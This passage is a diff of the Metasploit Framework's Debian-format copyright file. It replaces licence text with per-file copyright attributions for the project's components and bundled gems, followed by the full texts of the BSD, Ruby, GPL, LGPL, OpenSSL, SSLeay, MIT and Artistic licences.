aggregate the Package (either the Standard Version or - Modified Version) with other packages and Distribute the resulting - aggregation provided that you do not charge a licensing fee for the - Package. Distributor Fees are permitted, and licensing fees for other - components in the aggregation are permitted. The terms of this license - apply to the use and Distribution of the Standard or Modified Versions - as included in the aggregation. - . - (8) You are permitted to link Modified and Standard Versions with - other works, to embed the Package in a larger work of your own, or to - build stand-alone binary or bytecode versions of applications that - include the Package, and Distribute the result without restriction, - provided the result does not expose a direct interface to the Package. - . - . - Items That are Not Considered Part of a Modified Version - . - (9) Works (including, but not limited to, modules and scripts) that - merely extend or make use of the Package, do not, by themselves, cause - the Package to be a Modified Version. In addition, such works are not - considered parts of the Package itself, and are not subject to the - terms of this license. - . - . - General Provisions - . - (10) Any use, modification, and distribution of the Standard or - Modified Versions is governed by this Artistic License. By using, - modifying or distributing the Package, you accept this license. Do not - use, modify, or distribute the Package, if you do not accept this - license. - . - (11) If your Modified Version has been derived from a Modified - Version made by someone other than you, you are nevertheless required - to ensure that your Modified Version complies with the requirements of - this license. - . - (12) This license does not grant you the right to use any trademark, - service mark, tradename, or logo of the Copyright Holder. - . - (13) This license includes the non-exclusive, worldwide, - free-of-charge patent license to make, have made, use, offer to sell, - sell, import and otherwise transfer the Package with respect to any - patent claims licensable by the Copyright Holder that are necessarily - infringed by the Package. If you institute patent litigation - (including a cross-claim or counterclaim) against any party alleging - that the Package constitutes direct or contributory patent - infringement, then this Artistic License to you shall terminate on the - date that such litigation is filed. - . - (14) Disclaimer of Warranty: - THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS - IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED - WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR - NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL - LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL - BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL - DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF - ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: Apache - Version 2.0, January 2004 - http://www.apache.org/licenses/ - . - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - . - 1. Definitions. - . - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - . - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - . - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - . - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - . - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - . - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - . - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - . - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - . - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - . - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - . - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - . - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - . - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - . - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - . - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - . - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - . - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - . - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - . - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - . - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - . - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - . - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - . - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - . - END OF TERMS AND CONDITIONS - . - APPENDIX: How to apply the Apache License to your work. - . - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - . - Copyright [yyyy] [name of copyright owner] - . - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - . - http://www.apache.org/licenses/LICENSE-2.0 - . - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -License: Zlib - This software is provided 'as-is', without any express or implied - warranty. In no event will the authors be held liable for any damages - arising from the use of this software. - . - Permission is granted to anyone to use this software for any purpose, - including commercial applications, and to alter it and redistribute it - freely, subject to the following restrictions: - . - 1. The origin of this software must not be misrepresented; you must not - claim that you wrote the original software. If you use this software - in a product, an acknowledgment in the product documentation would be - appreciated but is not required. - 2. Altered source versions must be plainly marked as such, and must not be - misrepresented as being the original software. +https://github.com/rapid7/metasploit-framework/blob/master/LICENSE + +Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ +Source: http://www.metasploit.com/ + +Files: * +Copyright: 2006-2016, Rapid7, Inc. +License: BSD-3-clause + +# The Metasploit Framework is provided under the 3-clause BSD license provided +# at the end of this file. +# +# The copyright on this package is held by Rapid7, Inc. +# +# This license does not apply to third-party components detailed below. +# +# Last updated: 2013-Nov-04 +# + +Files: data/templates/to_mem_pshreflection.ps1.template +Copyright: 2012, Matthew Graeber +License: BSD-3-clause + +Files: data/john/* +Copyright: 1996-2011 Solar Designer. +License: GPL-2 + +Files: external/pcaprub/* +Copyright: 2007-2008, Alastair Houghton +License: LGPL-2.1 + +Files: external/ruby-kissfft/* +Copyright: 2003-2010 Mark Borgerding + 2009-2012 H D Moore +License: BSD-3-clause + +Files: external/source/exploits/IE11SandboxEscapes/* +Copyright: James Forshaw, 2014 +License: GPLv3 + +Files: external/source/byakugan/* +Copyright: Lurene Grenier, 2009 +License: BSD-3-clause + +Files: external/source/ipwn/* +Copyright: 2004-2005 vlad902 + 2007 H D Moore +License: GPL-2 and Artistic + +Files: external/source/ReflectiveDLLInjection/* +Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +License: BSD-3-clause + +Files: external/source/metsvc/* +Copyright: 2007, Determina Inc. +License: BSD-3-clause + +Files: external/source/tightvnc/* +Copyright: 1999 AT&T Laboratories Cambridge. + 2000 Tridia Corp. + 2002-2003 RealVNC Ltd. + 2001-2004 HorizonLive.com, Inc. + 2000-2007 Constantin Kaplinsky + 2000-2009 TightVNC Group +License: GPL-2 + +Files: external/source/unixasm/* +Copyright: 2004-2008 Ramon de Carvalho Valle +License: BSD-4-clause + +Files: external/source/vncdll/winvnc/* +Copyright: 1999 AT&T Laboratories Cambridge. + 2000 Tridia Corp. + 2002-2003 RealVNC Ltd. + 2001-2004 HorizonLive.com, Inc. + 2000-2006 Constantin Kaplinsky. + 2000-2009 TightVNC Group +License: GPL-2 + +Files: lib/anemone.rb lib/anemone/* +Copyright: 2009 Vertive, Inc. +License: MIT + +Files: lib/bit-struct.rb lib/bit-struct/* +Copyright: 2005-2009, Joel VanderWerf +License: Ruby + +Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* +Copyright: 2006-2010 Yoann GUILLOT +License: LGPL-2.1 + +Files: lib/nessus/* +Copyright: Vlatoko Kosturjak +License: BSD-3-clause + +Files: lib/net/dns.rb lib/net/dns/* +Copyright: 2006 Marco Ceresa +License: Ruby + +Files: lib/net/ssh.rb lib/net/ssh/* +Copyright: 2008 Jamis Buck +License: MIT + +Files: lib/packetfu.rb lib/packetfu/* +Copyright: 2008-2012 Tod Beardsley +License: BSD-3-clause + +Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb +Copyright: 2005 Michael Neumann +License: BSD-3-clause or Ruby + +Files: lib/openvas/* +Copyright: No copyright statement provided +License: MIT + +Files: lib/rabal/* +Copyright: Jeremy Hinegadner +License: Ruby + +Files: lib/rbmysql.rb lib/rbmysql/* +Copyright: 2009 tommy +License: Ruby + +Files: lib/rbreadline.rb +Copyright: 2009 Park Heesob +License: BSD-3-clause + +Files: lib/rkelly/* +Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette +License: MIT + +Files: lib/snmp.rb lib/snmp/* +Copyright: 2004, David R. Halliday +License: Ruby + +Files: lib/sshkey.rb lib/sshkey/* +Copyright: 2011 James Miller +License: MIT + +Files: lib/windows_console_color_support.rb +Copyright: 2011 Michael 'mihi' Schierl +License: BSD-3-clause + +Files: lib/zip.rb lib/zip/* +Copyright: 2002-2004, Thomas Sandergaard +License: Ruby + +Files: modules/payloads/singles/windows/speak_pwned.rb +Copyright: 2009-2010 Berend-Jan "SkyLined" Wever +License: BSD-3-clause + +Files: data/webcam/api.js +Copyright: Copyright 2013 Muaz Khan<@muazkh>. +License: MIT + + +# +# Gems +# + +Files: activemodel +Copyright: 2004-2011 David Heinemeier Hansson +License: MIT + +Files: activerecord +Copyright: 2004-2011 David Heinemeier Hansson +License: MIT + +Files: activesupport +Copyright: 2005-2011 David Heinemeier Hansson +License: MIT + +Files: arel +Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson +License: MIT + +Files: bcrypt +Copyright: 2007-2011 Coda Hale +License: MIT + +Files: builder +Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com) +License: MIT + +Files: database_cleaner +Copyright: 2009 Ben Mabey +License: MIT + +Files: diff-lcs +Copyright: 2004-2011 Austin Ziegler +License: MIT + +Files: factory_girl +Copyright: 2008-2013 Joe Ferris and thoughtbot, inc. +License: MIT + +Files: fivemat +Copyright: 2012 Tim Pope +License: MIT + +Files: i18n +Copyright: 2008 The Ruby I18n team +License: MIT + +Files: json +Copyright: Daniel Luz +License: Ruby + +Files: metasploit_data_models +Copyright: 2012 Rapid7, Inc. +License: MIT + +Files: mini_portile +Copyright: 2011 Luis Lavena +License: MIT + +Files: msgpack +Copyright: Austin Ziegler +License: Ruby + +Files: multi_json +Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. +License: MIT + +Files: network_interface +Copyright: 2012, Rapid7, Inc. +License: MIT + +Files: nokogiri +Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada +License: MIT + +Files: packetfu +Copyright: 2008-2012 Tod Beardsley +License: BSD-3-clause + +Files: pcaprub +Copyright: 2007-2008, Alastair Houghton +License: LGPL-2.1 + +Files: pg +Copyright: 1997-2012 by the authors +License: Ruby + +Files: rake +Copyright: 2003, 2004 Jim Weirich +License: MIT + +Files: redcarpet +Copyright: 2009 Natacha Porté +License: MIT + +Files: robots +Copyright: 2008 Kyle Maxwell, contributors +License: MIT + +Files: rspec +Copyright: 2009 Chad Humphries, David Chelimsky +License: MIT + +Files: shoulda-matchers +Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc. +License: MIT + +Files: simplecov +Copyright: 2010-2012 Christoph Olszowka +License: MIT + +Files: timecop +Copyright: 2012 Travis Jeffery, John Trupiano +License: MIT + +Files: tzinfo +Copyright: 2005-2006 Philip Ross +License: MIT + +Files: yard +Copyright: 2007-2013 Loren Segal +License: MIT + + +License: BSD-2-clause + Redistribution and use in source and binary forms, with or without modification, + are permitted provided that the following conditions are met: + . + Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + . + Redistributions in binary form must reproduce the above copyright notice, this + list of conditions and the following disclaimer in the documentation and/or + other materials provided with the distribution. + . + THIS SOFTWARE IS PROVIDED BY {{THE COPYRIGHT HOLDERS AND CONTRIBUTORS}} "AS IS" + AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL {{THE COPYRIGHT HOLDER OR CONTRIBUTORS}} BE + LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE + GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT + OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: BSD-3-clause + Redistribution and use in source and binary forms, with or without modification, + are permitted provided that the following conditions are met: + . + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + . + * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + . + * Neither the name of Rapid7, Inc. nor the names of its contributors + may be used to endorse or promote products derived from this software + without specific prior written permission. + . + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND + ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR + ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON + ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: BSD-4-clause + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are met: + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + 3. All advertising materials mentioning features or use of this software + must display the following acknowledgement: + This product includes software developed by the . + 4. Neither the name of the nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + . + THIS SOFTWARE IS PROVIDED BY ''AS IS'' AND ANY + EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY + DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND + ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: Ruby + 1. You may make and give away verbatim copies of the source form of the + software without restriction, provided that you duplicate all of the + original copyright notices and associated disclaimers. + . + 2. You may modify your copy of the software in any way, provided that + you do at least ONE of the following: + . + a) place your modifications in the Public Domain or otherwise + make them Freely Available, such as by posting said + modifications to Usenet or an equivalent medium, or by allowing + the author to include your modifications in the software. + . + b) use the modified software only within your corporation or + organization. + . + c) rename any non-standard executables so the names do not conflict + with standard executables, which must also be provided. + . + d) make other distribution arrangements with the author. + . + 3. You may distribute the software in object code or executable + form, provided that you do at least ONE of the following: + . + a) distribute the executables and library files of the software, + together with instructions (in the manual page or equivalent) + on where to get the original distribution. + . + b) accompany the distribution with the machine-readable source of + the software. + . + c) give non-standard executables non-standard names, with + instructions on where to get the original software distribution. + . + d) make other distribution arrangements with the author. + . + 4. You may modify and include the part of the software into any other + software (possibly commercial). But some files in the distribution + are not written by the author, so that they are not under this terms. + They are gc.c(partly), utils.c(partly), regex.[ch], fnmatch.[ch], + glob.c, st.[ch] and some files under the ./missing directory. See + each file for the copying condition. + . + 5. The scripts and library files supplied as input to or produced as + output from the software do not automatically fall under the + copyright of the software, but belong to whomever generated them, + and may be sold commercially, and may be aggregated with this + software. + . + 6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED + WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR + PURPOSE. + +License: GPL-2 + This program is free software; you can redistribute it + and/or modify it under the terms of the GNU General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later + version. + . + This program is distributed in the hope that it will be + useful, but WITHOUT ANY WARRANTY; without even the implied + warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR + PURPOSE. See the GNU General Public License for more + details. + . + You should have received a copy of the GNU General Public + License along with this package; if not, write to the Free + Software Foundation, Inc., 51 Franklin St, Fifth Floor, + Boston, MA 02110-1301 USA + . + On Debian systems, the full text of the GNU General Public + License version 2 can be found in the file + `/usr/share/common-licenses/GPL-2'. + +License: LGPL-2.1 + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + . + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + . + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + +License: OpenSSL + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + . + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + . + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in + the documentation and/or other materials provided with the + distribution. + . + 3. All advertising materials mentioning features or use of this + software must display the following acknowledgment: + "This product includes software developed by the OpenSSL Project + for use in the OpenSSL Toolkit. (http://www.openssl.org/)" + . + 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to + endorse or promote products derived from this software without + prior written permission. For written permission, please contact + openssl-core@openssl.org. + . + 5. Products derived from this software may not be called "OpenSSL" + nor may "OpenSSL" appear in their names without prior written + permission of the OpenSSL Project. + . + 6. Redistributions of any form whatsoever must retain the following + acknowledgment: + "This product includes software developed by the OpenSSL Project + for use in the OpenSSL Toolkit (http://www.openssl.org/)" + . + THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY + EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR + ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT + NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED + OF THE POSSIBILITY OF SUCH DAMAGE. + . + This product includes cryptographic software written by Eric Young + (eay@cryptsoft.com). This product includes software written by Tim + Hudson (tjh@cryptsoft.com). + +License: SSLeay + This package is an SSL implementation written + by Eric Young (eay@cryptsoft.com). + The implementation was written so as to conform with Netscapes SSL. + . + This library is free for commercial and non-commercial use as long as + the following conditions are aheared to. The following conditions + apply to all code found in this distribution, be it the RC4, RSA, + lhash, DES, etc., code; not just the SSL code. The SSL documentation + included with this distribution is covered by the same copyright terms + except that the holder is Tim Hudson (tjh@cryptsoft.com). + . + Copyright remains Eric Young's, and as such any Copyright notices in + the code are not to be removed. + If this package is used in a product, Eric Young should be given attribution + as the author of the parts of the library used. + This can be in the form of a textual message at program startup or + in documentation (online or textual) provided with the package. + . + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + 1. Redistributions of source code must retain the copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + 3. All advertising materials mentioning features or use of this software + must display the following acknowledgement: + "This product includes cryptographic software written by + Eric Young (eay@cryptsoft.com)" + The word 'cryptographic' can be left out if the rouines from the library + being used are not cryptographic related :-). + 4. If you include any Windows specific code (or a derivative thereof) from + the apps directory (application code) you must include an acknowledgement: + "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" + . + THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND + ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + SUCH DAMAGE. + . + The licence and distribution terms for any publically available version or + derivative of this code cannot be changed. i.e. this code cannot simply be + copied and put under another distribution licence + [including the GNU Public Licence.] + +License: MIT + Permission is hereby granted, free of charge, to any person obtaining + a copy of this software and associated documentation files (the + "Software"), to deal in the Software without restriction, including + without limitation the rights to use, copy, modify, merge, publish, + distribute, sublicense, and/or sell copies of the Software, and to + permit persons to whom the Software is furnished to do so, subject to + the following conditions: + . + The above copyright notice and this permission notice shall be + included in all copies or substantial portions of the Software. + . + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE + LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION + OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION + WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +License: Artistic + Copyright (c) 2000-2006, The Perl Foundation. + . + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + . + Preamble + . + This license establishes the terms under which a given free software + Package may be copied, modified, distributed, and/or redistributed. + The intent is that the Copyright Holder maintains some artistic + control over the development of that Package while still keeping the + Package available as open source and free software. + . + You are always permitted to make arrangements wholly outside of this + license directly with the Copyright Holder of a given Package. If the + terms of this license do not permit the full use that you propose to + make of the Package, you should contact the Copyright Holder and seek + a different licensing arrangement. + . + Definitions + . + "Copyright Holder" means the individual(s) or organization(s) + named in the copyright notice for the entire Package. + . + "Contributor" means any party that has contributed code or other + material to the Package, in accordance with the Copyright Holder's + procedures. + . + "You" and "your" means any person who would like to copy, + distribute, or modify the Package. + . + "Package" means the collection of files distributed by the + Copyright Holder, and derivatives of that collection and/or of + those files. A given Package may consist of either the Standard + Version, or a Modified Version. + . + "Distribute" means providing a copy of the Package or making it + accessible to anyone else, or in the case of a company or + organization, to others outside of your company or organization. + . + "Distributor Fee" means any fee that you charge for Distributing + this Package or providing support for this Package to another + party. It does not mean licensing fees. + . + "Standard Version" refers to the Package if it has not been + modified, or has been modified only in ways explicitly requested + by the Copyright Holder. + . + "Modified Version" means the Package, if it has been changed, and + such changes were not explicitly requested by the Copyright + Holder. + . + "Original License" means this Artistic License as Distributed with + the Standard Version of the Package, in its current version or as + it may be modified by The Perl Foundation in the future. + . + "Source" form means the source code, documentation source, and + configuration files for the Package. + . + "Compiled" form means the compiled bytecode, object code, binary, + or any other form resulting from mechanical transformation or + translation of the Source form. + . 